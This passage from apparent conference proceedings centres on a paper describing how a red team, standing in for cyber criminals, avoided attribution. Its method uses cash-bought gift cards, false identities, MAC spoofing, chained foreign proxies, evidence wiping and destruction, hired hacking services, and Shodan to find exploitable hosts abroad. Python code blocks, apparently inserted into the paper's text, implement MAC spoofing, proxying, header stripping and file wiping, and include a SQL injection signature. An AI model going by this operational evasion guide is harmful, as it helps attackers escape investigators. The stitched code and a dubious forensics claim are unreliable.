Reuters, FBI probes cyber attack on Citigroup: report | Reuters. Available at:<br />
http://www.reuters.com/article/idUSTRE5BL0I320091222 [Accessed September 11, 2010].<br />
Trias, E.D. & Bell, B.M., Cyber This, Cyber That . . . So What? Air & Space Power Journal, Spring 2010.<br />
Available at: http://www.airpower.maxwell.af.mil/airchronicles/apj/apj10/spr10/trias.html [Accessed<br />
September 11, 2010].<br />
Wallace, R., 2009. Spycraft : the secret history of the CIA's spytechs, from communism to Al-Qaeda, New York:<br />
Plume.<br />
Waterman, S., Analysis: Who cyber smacked Estonia? - UPI.com. Available at:<br />
http://www.upi.com/Business_News/Security-Industry/2007/06/11/Analysis-Who-cyber-smacked-<br />
Estonia/UPI-26831181580439/ [Accessed September 11, 2010].<br />
Catch me if you can: Cyber Anonymity<br />
David Rohret and Michael Kraft<br />
Joint Information Operations Warfare Center (JIOWC), Texas, USA<br />
drohret@ieee.org<br />
mkraft5@csc.com<br />
Abstract: Advances in network security and litigation have empowered and enabled corporations to conduct Internet and desktop surveillance on their employees, to increase productivity, and on their customers, to gain valuable marketing data. Governments have spent billions to monitor cyberspace and have entered agreements with corporations to provide surveillance data on adversarial groups, competitors, and citizenry (Reuters, 2010). Examples include the Chinese government's monitoring of the Internet (Markoff, 2008), the United Kingdom's plan to track every email, phone call, and website visited (Whitehead, 2010), and the recent announcement from the United States that a program named “Perfect Citizen” (Bradley, 2010) will be used to identify those committing cybercrimes and terrorist activities. These government surveillance programs have many concerned that anonymity on the Internet is non-existent and that the real objectivity and candidness found on news, educational, and research websites is being replaced with a “big brother” atmosphere, preventing open discussion and information transfers between domains. Although the initial intent of network and Internet monitoring may be honourable, terrorists, hackers, and cyber-criminals already have access to the necessary tools and methodologies to continue their activities unabated. State and non-state adversaries can use these same tools and methodologies to divert malicious and offensive actions towards a common adversary, avoiding attribution while increasing tensions among non-actors.<br />
Concerned educators, scientists, and citizens are rebelling against Internet monitoring, providing the impetus for developers and entrepreneurs to create methods, tools, and virtual private networks that provide secrecy for those wishing to remain invisible, avoiding detection by employers, law enforcement, and other government agencies (Ultimate-Anonymity, 2010). The intent of this research is first to briefly identify the efforts required by governments to track and monitor individuals and groups wishing to remain anonymous within the cyber community. The authors define “cyber community” as the boundaries within any tool, process, or mechanism utilizing Transmission Control Protocol (TCP)/Internet Protocol (IP), or similar protocols, that allows for the transfer and aggregation of information and data. In contrast, the authors then identify a process for remaining wholly anonymous in the context of an internet identity. This is demonstrated in a step-by-step case study using a “paranoid” approach to remaining anonymous.<br />
Keywords: anonymity, network, internet surveillance, foreign proxy, hacker, big brother<br />
1. Terms defined<br />
The term Internet anonymity, and the abstract or hypothetical optimum of remaining anonymous, have differing definitions based on the “completeness” of anonymity desired. In several definitions, “anonymous” simply means remaining obscure (Answers.com, 2010), not necessarily completely hidden from sight. In other definitions, anonymous refers to remaining nameless, without shape or form (wordnetweb.princeton.edu, 2010), and this is the definition the authors have used throughout this paper. This theme also extends to other terms that describe deception, the destruction of data, or misdirection; specifically, it concerns the completeness of the action being described. The word “government” will also be used in a manner that includes all government entities, including law enforcement, military, and intelligence agencies.<br />
2. Overview<br />
Network-centric red teams are charged with emulating known adversaries and hackers (remote and insider threats) using, for the most part, only open-source and publicly accessible tools and software. Unlike penetration testers, who use exploits to validate vulnerabilities, red teams are responsible for viewing networks or systems from every angle to defeat the defences in place. This includes, but is not limited to, physical security, biometrics, social engineering, and, of course, preventing the blue team from assigning attribution to the red team's actions. In this type of security stress-test a client is able to fully realize its system's security posture, which encompasses much more than a vulnerability scan and penetration test.<br />
Governments and corporations have realized the advantages of communications and data transfers via the Internet for economic and defensive purposes. They have also realized the dangers and costs of cyber crime, malicious hacking, espionage, and cyber warfare, and are developing new technologies and implementing new legislation to defend networks and to trace and track attacks to their electronic point of origin (EPO). Without verification and validation, courts will not convict, and governments are unwilling to counter-attack, as clear attribution cannot be assigned. In order to remain anonymous or<br />
assign blame to another party, the authors use the Praestigiae Cone (Rohret & Jett, 2009) displayed in Figure 1. The Praestigiae Cone can be visualized as seven protective layers (a cone architecture) used in multiple steps to allow hackers, adversaries, or any other group to operate from a cloaked vantage point. The organization or individual attempting to identify what the shields are hiding can attack any one of them at a time, but cannot move from one layer to the next without first solving the initial “who-is” puzzle for the layer they have identified. Making the task of identifying the actual user(s) more difficult is the fact that each shield is time-sensitive, creating a fast-moving defensive environment that is held hostage to the cyber criminal's (or user's) schedule.<br />
Figure 1: The Praestigiae Cone is used to hide one from, and deceive, those trying to identify the original source of an attack or network traffic (Rohret & Jett, 2009)<br />
As difficult as it appears for law enforcement and government agencies to crack all seven layers, it takes only one mistake or missed step by an adversary or hacker to allow investigators to discover their true identity. Therefore, the authors provide a brief description of known capabilities to establish why an adversary must take the seemingly paranoid precautions, identified later in this paper, in order to remain anonymous.<br />
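The cone's mechanics can be sketched in code: layers must be peeled strictly in order, and each shield's “who-is” answer rotates on the user's schedule, so answers solved early can go stale while later layers are still being cracked. The layer labels, rotation interval, and solve times below are invented for illustration; the actual seven layers are defined in Rohret & Jett (2009).

```python
# Hypothetical layer labels; the real seven layers are in Rohret & Jett (2009).
LAYERS = ["public proxy", "compromised host", "VPN exit", "anonymous account",
          "prepaid connection", "spoofed MAC", "physical location"]

class Shield:
    """One protective layer whose 'who-is' answer rotates on the user's schedule."""
    def __init__(self, name, rotation_seconds):
        self.name = name
        self.rotation_seconds = rotation_seconds
        self.solved_at = None          # time the investigator cracked this layer

    def solve(self, now):
        self.solved_at = now

    def is_stale(self, now):
        """True if the layer has rotated since it was solved."""
        return self.solved_at is not None and now - self.solved_at >= self.rotation_seconds

def peel(cone, seconds_per_layer):
    """Solve the layers strictly in order; each costs time, during which
    earlier answers may expire. Returns (finish_time, stale_layer_names)."""
    clock = 0
    for shield in cone:
        clock += seconds_per_layer
        shield.solve(clock)
    return clock, [s.name for s in cone if s.is_stale(clock)]

cone = [Shield(name, rotation_seconds=3600) for name in LAYERS]
finish, stale = peel(cone, seconds_per_layer=900)
# Solving seven layers at 15 minutes each takes 105 minutes; every layer
# solved an hour or more before the finish has already rotated.
```

The point of the sketch is the asymmetry the text describes: the defender (the anonymous user) only has to rotate faster than the investigator can peel, while the investigator must solve every layer before any of them rotates.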
3. Identifying and tracking internet users<br />
“...the FBI successfully infected the anonymous source's computer, and they soon discovered<br />
his identity” (Begun, 2009).<br />
In order to quantify the actions taken to remain anonymous, we must first identify the many ways an individual or group can be located, tracked, and discovered. By no means are the methods described below used solely against cyber crime or cyber warfare, but they are a major part of a government's arsenal in fighting cyber criminals and dissidents. Because so many different tools and techniques are used by different governments and agencies, the authors have generalized the techniques, using specific examples to represent the greater capabilities. This brief overview helps to demonstrate why a paranoid approach is required to protect an anonymous identity on the Internet.<br />
Trojans, Beacons, and Worms<br />
The above quote from Daniel Begun illustrates one way to identify illegal media downloads or snooping hackers. The process is as easy as providing interesting material on known download sites with embedded Trojans or beacons that notify law enforcement of the violation. Although effective, it is difficult for government agencies to target specific groups or individual violators, as this process is more of a<br />
reverse phishing expedition. To target specific groups such as cyber criminals or adversarial governments, similar techniques would be used with live data or in a well-designed honeypot that seemingly held the type of data the targeted group would maintain on its site. The music industry has had minor successes using these techniques (Associated Press, 2005).<br />
Financial Transactions<br />
Financial transactions can easily be associated with an individual wherever they take place. For an international economy to work, governments and corporations, often at odds with one another, must work together to prevent crimes that threaten markets and currencies. Because the world has rapidly become digitized, credit cards, Internet payment services, and smart-phone purchases allow anyone with a bank account to be a consumer. Furthermore, most businesses and banks now utilize video surveillance at the point of transaction, creating a scenario where even cash purchases of a serial-numbered commodity or a financial document can lead investigators to a digital picture of the perpetrator. The United States' Financial Crimes Enforcement Network (FinCEN), established in 1990, is considered the leading expert in solving crimes involving financial transactions, including cyber crimes (Kimery, 2010; FinCEN, 2010).<br />
Digital and Cellular Communications<br />
"It's time for you to get some new cell phones, quick," was the warning given to Brian Ross and his ABC News investigation team (Ross, 2006) by someone they considered an NSA insider. This older news story describes an agency leak that identified how intelligence agencies (and presumably law enforcement agencies) are able to track individuals using telecommunications for activities they (the agency) deem interesting or counter to national security. Radio Frequency (RF) triangulation to pinpoint the locations of smart phones and other online digital devices is also possible with the use of good spectrum analyzers and a direction finder. This applies to 802.11, 802.16, GSM, CDMA, and other Internet Protocol (IP) over radio and wireless standards.<br />
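The geometric core of position-fixing from RF measurements can be illustrated with a simplified 2-D trilateration from three clean range estimates. This is only the algebra; real direction-finding must cope with noise, multipath, and bearings rather than ideal ranges, and the receiver layout below is an assumption chosen to keep the math short.

```python
import math

def trilaterate(d1, d2, d3, a=10.0):
    """Recover (x, y) of a transmitter from its distances d1, d2, d3 to
    receivers placed at (0, 0), (a, 0) and (0, a).

    Subtracting the circle equations pairwise cancels the x^2 + y^2 terms,
    leaving two linear equations:
        d2^2 - d1^2 = a^2 - 2*a*x   and   d3^2 - d1^2 = a^2 - 2*a*y
    """
    x = (a * a - (d2 * d2 - d1 * d1)) / (2 * a)
    y = (a * a - (d3 * d3 - d1 * d1)) / (2 * a)
    return x, y

# A transmitter at (3, 4), as measured from the three receivers:
d1 = math.hypot(3, 4)          # distance to (0, 0), i.e. 5.0
d2 = math.hypot(3 - 10, 4)     # distance to (10, 0)
d3 = math.hypot(3, 4 - 10)     # distance to (0, 10)
position = trilaterate(d1, d2, d3)
```

With exact ranges the recovered position is exactly (3.0, 4.0); with noisy ranges the same linear system would be solved in a least-squares sense over more than three receivers.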
Tracking Internet Traffic<br />
The most common method of identifying malicious Internet activity and attempting to identify the culprit is network and Internet surveillance. Intrusion detection systems, intrusion prevention systems, intelligent and stateful firewalls, packet sniffers, etc., provide network administrators and cyber crime investigators with powerful tools for identifying attack signatures, and sophisticated pattern analyses help investigators attribute an attack or malicious action to a specific group or individual. This is not to say they know the actual identity of the group or individuals involved, but rather that they can match patterns of attacks or actions with enough confidence to suggest that the same perpetrators were involved. These capabilities have become more precise in recent years as corporations and governments cooperate in sharing information and sensor data. For example, the marriage between the search engine giant Google and the NSA made headlines, sending shock waves through the Internet community and creating worries that anyone can be “spied” on at any time (Reuters, 2010). An adversary or malicious hacker must also assume that international arrangements and agreements have been implemented, providing world-wide coverage and tracing capabilities.<br />
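The signature-and-pattern matching described above can be sketched minimally: count how many distinct known signatures fire per suspected group, and attribute only when the hit count clears a confidence threshold. The regular expressions and group labels below are invented for illustration and bear no relation to any real rule set (real IDS rule languages, such as Snort's, are far richer).

```python
import re

# Invented signature set for illustration only.
SIGNATURES = {
    "group-A": [re.compile(r"GET /admin\.php\?cmd="),
                re.compile(r"User-Agent: scanbot/1\.")],
    "group-B": [re.compile(r"' OR '1'='1")],
}

def attribute(log_lines, min_hits=2):
    """Count signature hits per group and return the groups whose patterns
    fire often enough to suggest (not prove) the same perpetrator."""
    scores = {group: 0 for group in SIGNATURES}
    for line in log_lines:
        for group, patterns in SIGNATURES.items():
            if any(p.search(line) for p in patterns):
                scores[group] += 1
    return [g for g, s in scores.items() if s >= min_hits]

logs = [
    "10.0.0.5 GET /admin.php?cmd=id",
    "10.0.0.5 User-Agent: scanbot/1.3",
    "10.0.0.9 GET /index.html",
]
suspects = attribute(logs)
# Two distinct group-A signatures fire, so the traffic is *consistent with*
# group-A's known pattern -- which is pattern confidence, not identity.
```

This mirrors the distinction the text draws: matching attack patterns supports attribution to a behavioural profile, not to the person at the keyboard.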
Computer Forensics<br />
Possession of a suspect's computer is the golden egg for investigators. The term computer forensics, as used in this paper, refers to identifying incriminating evidence on the suspect's system or on a storage device used by the suspect. Entire computer laboratories are dedicated to forensic analysis for identifying incriminating evidence, ranging from simple low-tech techniques to highly sophisticated electron interferometry. An example of a low-tech analysis would be the capture of a system that is still running and accessible, whereas electron interferometry involves reading open and closed memory gates in a system's memory at temperatures below negative 60 Celsius, even if the system has been shut down for several minutes (Vourdas & Sanders, 1998).<br />
Physical Investigations<br />
“Feet” on the ground to identify patterns and locations are part of the final stage of an investigation to<br />
identify and/or catch a suspect. This includes using video surveillance from Internet cafes frequented<br />
David Rohret and Michael Kraft<br />
by the suspect or an old-fashioned stake-out to catch them in the act. Cyber crime investigations are
commonplace, and many are high profile, prompting law enforcement agencies to allocate significant
resources to rapidly solve cases.
4. A paranoid approach to remaining anonymous<br />
Why a paranoid approach to anonymity? Governments, adversaries, corporations, cyber criminals,<br />
even cheating spouses require a repeatable process they can employ to accomplish sensitive activities<br />
across the World Wide Web without detection or retribution. In a recent article prepared for the<br />
North Atlantic Treaty Organization (NATO) Parliamentary Assembly (Myrli, 2010) the cost of cyber<br />
crimes to governments and corporations is reported to be over US $100B annually. In response to<br />
cyber crime, governments and corporations spend billions more on technology and methodologies to<br />
identify, track, and prosecute cyber criminals (Fenwick, 2010). Not only have governments increased<br />
expenditures and resources to combat cyber crime, there is now unprecedented cooperation among<br />
governments and corporations to provide data and information sharing to identify and/or capture offenders<br />
(Golubev, 2005). Therefore, for an adversary or cyber criminal to successfully use the Internet
for nefarious purposes and remain anonymous, they must take a holistic view of the security available
to their intended targets; that is to say, they must assume each capability is available and successfully
deployed. Just as a network security officer does not have the luxury of defending against only some
or most of the vulnerabilities on their network, a cyber criminal or cyber warrior cannot depend on a
law enforcement agency to use only some of the methods described in section 3.
This paper is the result of research into adversarial capabilities in cyber warfare, specifically, how a<br />
network-centric red team, acting as the adversary, would prevent positive attribution after conducting<br />
network reconnaissance or an attack. The following case study reflects precautions and actions used
to create the shields in the Praestigiae Cone, described in Figure 1, using combinations of publicly
available technology, services, and research. Figure 2 outlines the process of achieving the seven
shields, resulting in complete anonymity. The details are explained using a scenario based on an actual
case study involving a red team assessment on an enterprise network.
Figure 2: A process for remaining anonymous in cyber space<br />
Scenario: The red team’s goal was to emulate a hacker’s capability to remotely identify and disable an
automated network-controlled surveillance system that included wireless video, fence and ground
sensors, autonomous vehicle sentries, and network security, without being identified as the adversary.
The red team assumed that all networks were monitored and that Internet service providers, search
engines, and even proxy services would provide information to authorities in a timely manner. Each
action taken by the red team, and every service purchased and used, was publicly available and operating
in a legal capacity. The following steps provided Internet and network anonymity, allowing the
red team to accomplish its mission without allowing security managers to assign attribution to the attack.
Physical Security and Financial Shields<br />
The red team’s first step was to build laptop systems specifically for their requirements. This included
downloading free VM software for the installation of multiple operating systems. By using freely distributed
VM software, the red team avoided leaving any record of their use of VM software through
registration services or processes (Oracle, 2010). Operating systems already configured
for use in a VM environment were also available for public download, and each download and
installation was accomplished from a non-authenticating Internet cafe. Two anonymity proxy services
were required; these were purchased using two separate MasterCard gift cards that were separately
purchased with cash at two convenience stores found not to be using video surveillance.
Virtualization and Spoofing Shields<br />
Creating a system that protects against evidence retrieval is vital for a red team emulating adversarial
techniques. Virtual operating systems give developers and administrators the capability to
create instances of an entire network for testing and evaluation; similarly, cyber criminals and adversaries
use virtual networks for pre-exploit testing and as disposable systems following an attack or
exploitation. If all other layers of anonymity fail, it is imperative that attribution cannot be determined
from information, logs, or data found on the attacker’s host system. In this case study, our red team
used multiple pre-built virtual machines on re-usable host systems, creating temporary and disposable
attack platforms. Continuing our paranoid approach, we used open-source resources to download
and install the following files using a false identity:
Virtual Machine Hosting Software: The authors downloaded Microsoft’s Virtual PC 2007 software.<br />
With Microsoft Virtual PC 2007, you can create and run one or more virtual machines (each with<br />
its own operating system) on a single computer. This provides you with the flexibility to use different<br />
operating systems on a single host platform (Microsoft, 2010).<br />
Virtual Machine Images: Virtual operating system images can be obtained in several ways; they<br />
can be loaded directly into the VM system (using un-registered software) or downloaded already<br />
built. Windows XP or Vista VM images are available at no cost from the National Institute of Standards
and Technology (NIST, 2010), and a Linux distribution was also obtained from an open-source
location (Back|Track-Linux.org, 2010). Hacker forums, how-to publications, and trial
downloads also provide source locations for acquiring operating systems to populate your virtual
machines without a financial or registration trail.
Host and VM System MAC Spoofing: Every network interface card (NIC) is assigned a unique<br />
serial number called a media access control (MAC) address. An investigator or network security<br />
officer can trace a MAC address in much the same way an IP address is traced, simply by using a
packet-sniffing tool, such as Wireshark, and filtering traffic by the MAC. Many novice hackers and careless
cyber criminals neglect to spoof MAC addresses prior to an attack, and just as often forget
to change them back to the original following an attack. In the red team’s quest to eliminate
any trace of their attacking systems on their host platforms, they used publicly available freeware
called Spoofmenow.exe (SourceForge, 2010) to change the MAC addresses of both the VM
system and their host platforms. Once the red team’s actions were completed (for each session),
they returned the host system to its original MAC address and deleted the VM system. This
would prevent investigators from identifying the host system as the computer used for an attack,
even if no other evidence was available. It was necessary to change the VM system’s MAC
address for two reasons: first, changing the MAC address to a manufacturer prefix that reflected the location
of the proxy server used for the attack created a better deception of where the attack
originated; second, and just as importantly, it avoided identifying the system as a virtual machine,
since most vulnerability scanners will identify a VM system by its MAC address.
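The MAC-changing step described above can be sketched in a few lines of Python. This is an illustrative sketch only, not the Spoofmenow.exe tool the red team used: it generates a random locally administered unicast MAC and emits the equivalent Linux `ip link` commands; the interface name is a placeholder.

```python
import random

def random_unicast_mac() -> str:
    """Generate a random MAC address with the 'locally administered'
    bit set and the multicast bit cleared, so it parses as an
    ordinary unicast NIC address."""
    first = (random.randrange(256) | 0x02) & 0xFE
    rest = [random.randrange(256) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

def linux_spoof_commands(iface: str, mac: str) -> list:
    """Return the shell commands (run as root) that apply a spoofed
    MAC on Linux -- the rough equivalent of what a Windows spoofing
    utility performs through the registry."""
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip link set dev {iface} up",
    ]
```

Restoring the original address afterwards, as the red team did after each session, is the same three commands with the hardware MAC recorded beforehand.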
Proxy and Remailer Shields<br />
A side effect of law enforcement’s increased capabilities is an increase in on-line services designed to
defeat them, such as anonymous proxies and remailers. Proxies are servers
that act as go-betweens, making requests for data on behalf of clients. A proxy receives a "request"
for a file, website, or other resource from a client, connects to the remote site, obtains the information,
and sends it back to the client. Remote proxies can allow you to surf the Web privately without
being monitored and are widely used by individuals who download copyrighted media or who
circumvent network security measures in order to view blocked Websites (Hazel Morgan, 2010).
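The go-between role described above can be illustrated with Python’s standard library. The proxy address shown in the usage comment is a hypothetical placeholder; commercial anonymity services layer encrypted VPN tunnels and rotating proxy chains on top of this basic mechanism.

```python
import urllib.request

def proxied_opener(proxy_url: str) -> urllib.request.OpenerDirector:
    """Build an opener whose HTTP and HTTPS requests are relayed
    through the given proxy, so the remote site sees the proxy's
    IP address rather than the client's."""
    handler = urllib.request.ProxyHandler({"http": proxy_url,
                                           "https": proxy_url})
    return urllib.request.build_opener(handler)

# Hypothetical usage -- 203.0.113.10 is a reserved documentation address:
# opener = proxied_opener("http://203.0.113.10:8080")
# opener.open("http://example.com")  # request appears to come from the proxy
```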
An anonymous remailer is an email service which receives client messages (with embedded instructions
on where to send them) and then forwards the messages without revealing where they originally
came from. By not maintaining a list of users or a log of the addresses their messages were sent to, a
remailer can ensure that any message it has forwarded leaves no internal information behind
that could be used to break identity confidentiality (Wikipedia, 2010).
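The forwarding behaviour of a remailer can be sketched with Python’s email module. The header list and the replacement address nobody@remailer.example are illustrative assumptions, not the behaviour of any particular remailer.

```python
from email import message_from_string

# Headers that reveal the original sender or the path a message took.
IDENTIFYING_HEADERS = ("From", "Sender", "Reply-To", "Return-Path",
                       "Received", "Message-ID", "X-Originating-IP",
                       "User-Agent")

def anonymize(raw: str, new_from: str = "nobody@remailer.example") -> str:
    """Strip identity-revealing headers before forwarding, keeping
    only the content headers and the body."""
    msg = message_from_string(raw)
    for header in IDENTIFYING_HEADERS:
        del msg[header]          # deletes every occurrence; no-op if absent
    msg["From"] = new_from
    return msg.as_string()
```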
Two proxy services were used by the red team. The first, Ultimate-Anonymity (Ultimate-Anonymity,
2010), was purchased using the first cash gift card and a false identity at a non-authenticating
wireless cafe. Red team members quickly set their proxy location to a proxy in India via
an encrypted VPN. Using an on-line IP lookup after starting the anonymous proxy service, the red
team confirmed they were seen on the Internet as originating from the location in India, as shown in
Figure 3.
Figure 3: This screen capture was acquired using an IP lookup from the host system; it shows that
the host is associated with an IP address from an Internet service provider located in India
and even provides the information in the host ISP’s primary customer languages
The second proxy service, HideMyAss.com (HMA), was purchased using the second gift card from<br />
another non-authenticating wireless cafe while connected through the first proxy, using a different<br />
false identity (HideMyAss.com, 2010). HMA’s user-friendly interface allowed the red team to choose<br />
multiple proxies in the Netherlands and Russia, changing IP addresses every 10 minutes.<br />
Although anonymous proxy services advertise that they do not maintain user logs and that they delete user information
in a timely manner, the red team assumed the anonymous proxy services would cooperate
with investigators. Therefore the red team did not use each proxy service for more than
one session, repeating the process for each follow-on action with different proxy locations, session
locations, and new identities.
Data (Evidence) Removal Shield<br />
There are various levels of paranoia, which will dictate how one might try to destroy the computer
evidence. One with little paranoia might decide simply to delete the virtual machine from the computer.
A more nervous approach might include using a disk cleaner to wipe a hard drive in accordance
with the DoD 5220.22-M standard (www.usaid.gov, 2010), which features multiple overwrites of random
characters. An open-source program like Darik's Boot and Nuke (DBAN) is a self-contained boot
disk that securely wipes the hard disks of most computers; DBAN will automatically and completely
delete the contents of any hard disk it can detect, which makes it an appropriate utility for bulk or
emergency data destruction (Sourceforge, 2010). Lastly, after completing disk scrubbing, the extremely
paranoid might destroy the computer by physically damaging the hard drives and
memory.
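A single-file analogue of the multi-pass overwrite idea can be sketched as follows. This is illustrative only: DoD 5220.22-M addresses whole drives, and journaling file systems or SSD wear-leveling can retain copies that a file-level overwrite never touches, which is why tools like DBAN operate on the raw disk from a boot environment.

```python
import os
import secrets

def wipe_file(path: str, passes: int = 3, chunk: int = 1 << 16) -> None:
    """Overwrite a file's contents in place with random bytes several
    times, forcing each pass to disk, then delete the file."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(chunk, remaining)
                f.write(secrets.token_bytes(n))
                remaining -= n
            f.flush()
            os.fsync(f.fileno())   # push this pass through the OS caches
    os.remove(path)
```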
Location/Deception and Time Shields<br />
As discussed earlier, time is the adversary’s or cyber criminal’s ally. The end goal is to accomplish an<br />
action without being identified or having it attributed to your team. By using a disciplined approach<br />
and restricting the amount of time each session is executed, each proxy service is used, and an identity<br />
is held, investigators will be kept busy allocating resources to identify computers and users that no<br />
longer exist. Even if investigators eventually locate one of the EPOs, the perpetrator will
have completed their mission and moved on to a new location with a new identity. Solving computer
crimes requires resources and specific skill sets that are not always readily available even to the most
advanced cyber crime organizations. Because the offender remains difficult to trace and presents multiple
targets that are easily erased, authorities will not be able to focus their efforts quickly enough to locate
and positively identify them.
The key component of keeping time as your ally is preventing a positive identification of your location.<br />
By location the authors refer to both the physical location of the attacker and their perceived location.<br />
Earlier we discussed the use of multiple non-authenticating Internet cafes and of multiple foreign
proxies, one tunneled through the other, but there are other methods to hide your true location:
third-party hackers and on-line resources that identify exploitable computers. Third-party
hacking services are available and can be purchased using a gift card while logged onto a proxy service.
Furio Gaming (Furio Gaming, 2010) is one such service that will either hack a system for you or
provide you the tools to do so. This service represents itself as a gaming and hacking company
and is located in a foreign country, which provides a layer of anonymity in itself. Other on-line services, such
as Shodanhq.com (SHODAN, 2010), provide an easy-to-use research tool allowing hackers to identify
exploitable systems worldwide. By identifying and exploiting a vulnerable
system in a country that may not cooperate with the country you are working in, a cyber criminal can
execute their objectives with little fear of attribution. Individuals or organizations
with greater resources could instead set up and configure their own anonymous proxies in countries and
locations that have liberal or non-existent cyber laws. For large-scale cyber attacks or highly profitable
schemes, this method may be more applicable and more robust.
5. Summary<br />
The inexpensive solution to cyber anonymity outlined in this case study can easily be implemented<br />
with minimal resources and without expert skill levels. Movies and television shows, such as “24”<br />
(IMDB 24, 2010) and “Live Free or Die Hard” (IMDB Live Free or Die Hard, 2010) depict governments<br />
and advanced cyber techniques that can pinpoint network and Internet users in real time; but for the<br />
most part, these capabilities do not exist. The fact remains that tracking a cyber criminal requires extensive
resources and is a time-consuming process involving multiple agencies and governments. It is
also imperative that government decision makers be wary of assigning attribution for an attack or malicious
action to a specific country or group, as the current state of cyber defence and investigations relies
heavily on the offending group making a mistake that would provide positive identification. The authors
do not intend to imply such capabilities cannot be or are not being developed, but rather the current<br />
state of Internet security and cyber laws do not provide sufficient capabilities and processes for<br />
positive attribution. As this case study has demonstrated, even if authorities are able to follow an attack<br />
or cyber crime to its electronic point of origin, that trail will only lead to a non-traceable false identity.<br />
Catch me if you can.<br />
References<br />
Answers.com. http://www.answers.com/topic/anonymity Anonymity definition. Oct 2010.<br />
Associated Press. Teen Convicted of Illegal Net Downloads. http://www.msnbc.msn.com/id/7122133/. March 7,<br />
2005.<br />
Back|Track-Linux.org. VMware Fusion 3.1. http://www.backtrack-linux.org/downloads/. Oct 2010.<br />
Begun, Daniel, A. FBI Uses Spyware to Capture Cyber Criminals. Hothardware.com, Monday, April 20, 2009.<br />
http://hothardware.com/News/FBI-Uses-Spyware-to-Capture-Cyber-Criminals/. 1 Oct 2010.<br />
Bradley, Tony. NSA 'Perfect Citizen' Raises 'Big Brother' Concerns, PC World, July 08, 2010 02:02 PM ET,<br />
http://www.networkworld.com/news/2010/070810-nsa-perfect-citizen-raises-big.html. Oct 2010.<br />
Fenwick, Samual, Dr. Cyber security – believe the hype? Industrial Fuels and Power.<br />
http://www.ifandp.com/article/006583.html. August 18, 2010.<br />
FinCEN. http://www.fincen.gov/. Oct 2010.<br />
Furio Gaming. http://www.furiogaming.com/index.php?page=home. Oct 2010.<br />
Golubev, Vladimir. International Cooperation in Fighting Cybercrime. Computer Crime Research Center,<br />
http://www.crime-research.org/articles/Golubev0405. April 16 2005.<br />
Hazel Morgan, e. C. (2010, March). Information on How Proxies Work. Retrieved October 12, 2010, from eHOW:<br />
http://www.ehow.com/facts_6054712_information-proxies-work.html.<br />
HideMyAss.com; Anonymous remailer and proxy service, http://www.HideMyAss.com. April 13, 2010.<br />
IMDB. 24 (2001 - 2010). http://www.imdb.com/title/tt0285331/. Oct 2010.<br />
IMDB. Live Free or Die Hard (2007). http://www.imdb.com/title/tt0337978/. Oct 2010.<br />
Kimery, Anthony. Big Brother Wants to Look in your Bank Account<br />
http://www.wired.com/wired/archive/1.06/big.brother_pr.html. 25 Sep 2010.<br />
Markoff, John. Surveillance of Skype Messages Found in China. New York Times: Internet. 1 October, 2008.<br />
Microsoft. Microsoft Virtual PC 2007. http://www.microsoft.com/downloads/en/details.aspx?FamilyId=04D26402-<br />
3199-48A3-AFA2-2DC0B40A73B6&displaylang=en. Oct 2010.<br />
Myrli, Sverre. 173 DSCFC 09 E bis – NATO and Cyber Defence. NATO Parliamentary Assembly,<br />
http://www.nato-pa.int/default.asp?SHORTCUT=1782. Sep 10 2010.<br />
NIST. National Institute of Standards and Technology. http://csrc.nist.gov/ Oct 2010.
Oracle. Oracle VM VirtualBox. http://dlc.sun.com/virtualbox/vboxdownload.html. Oct 2010.<br />
Reuters. Google, NSA to team up in cyberattack probe. February 4, 2010.<br />
Rohret, David M. and Jett, Andrew. Red Teaming: A Guide to Non-kinetic Warfare. 2009.
Ross, Brian. Federal Source to ABC News: We Know Who You're Calling. ABC News.<br />
http://blogs.abcnews.com/theblotter/2006/05/federal_source_.html. May 15, 2006.<br />
SHODAN. http://www.shodanhq.com/. Oct 2010.<br />
Sourceforge. (n.d.). Darik's Boot And Nuke (DBAN). http://www.dban.org/. Oct 2010.<br />
SourceForge. http://sourceforge.net/projects/spoof-me-now/files/Spoof-Me-<br />
Now%20%28No%20Installer%29.zip/download. September 2010.<br />
Ultimate-Anonymity. Anonymous remailer and proxy service. http://www.ultimate-anonymity.com/ July 7, 2010.<br />
USAid.gov. www.usaid.gov. http://www.usaid.gov/policy/ads/500/d522022m.pdf. October 2010.<br />
Vourdas, A., and Sanders, B. Determination of quantized electromagnetic-field state via electron interferometry<br />
1998 Europhys. Lett. 43 659 doi: 10.1209/epl/i1998-00414-0.<br />
Whitehead, Tim. Every email and web site to be stored. Telegraph.co.uk.<br />
http://www.telegraph.co.uk/technology/news/8075563/Every-email-and-website-to-be-stored.html 20 Oct<br />
2010.<br />
Wikipedia. (2010, July 14). Anonymous remailer. Retrieved October 12, 2010, from Wikipedia:<br />
http://en.wikipedia.org/wiki/Anonymous_remailer.<br />
WordNet. The state of being anonymous; nameless. http://wordnetweb.princeton.edu/perl/webwn?s=anonymity.
Oct 2010.
Neutrality in the Context of Cyberwar<br />
Julie Ryan 1 and Daniel Ryan 2<br />
1 The George Washington University, Washington, USA<br />
2 National Defense University, Washington, USA<br />
jjchryan@gwu.edu<br />
ryand@ndu.edu<br />
Abstract: This paper will examine the legal antecedents of the concepts of neutrality and current enforceability of<br />
declarations of neutrality in the context of information operations amongst belligerents. This is a non-trivial point<br />
of understanding, given the potential for belligerents to use and abuse infrastructure elements owned and/or<br />
operated by nation states desiring to remain neutral. The analysis will consider the instantiated concepts of<br />
neutrality, the potential for expanding or contracting the concepts of neutrality in the context of cyberwar, and the<br />
possibility of erosion of neutrality in cyberwar scenarios. We have a notion enshrined in international law that<br />
says that you don't lose your neutrality if belligerents use your telephone lines or telegraph lines to communicate<br />
even if they are crossing your territory, even if they are passing operational orders. The problem with cyberwar is<br />
that they are potentially not just transferring orders but also potentially weapons -- cyber-weapons. So it becomes<br />
a more complex problem and the challenge is to understand at what point the nation state should be required to<br />
act, or if such a point exists at all. This analysis will examine the intersection between technology and law in<br />
regards to this issue.<br />
Keywords: neutrality; law of armed conflict; international humanitarian law; cyberwar<br />
1. War and the laws of armed conflict<br />
For less than one percent of the last two million or so years of human evolution have agriculture and
animal husbandry replaced the hunter-gatherer existence as a characteristic way of life. (Gat 2006, p.
4) During the hunter-gatherer phase, humans engaged in endemic primitive warfare. (Keegan 1993,
p. 5 and pp. 115ff) As technology evolved, it influenced – and was influenced by – warfare, producing<br />
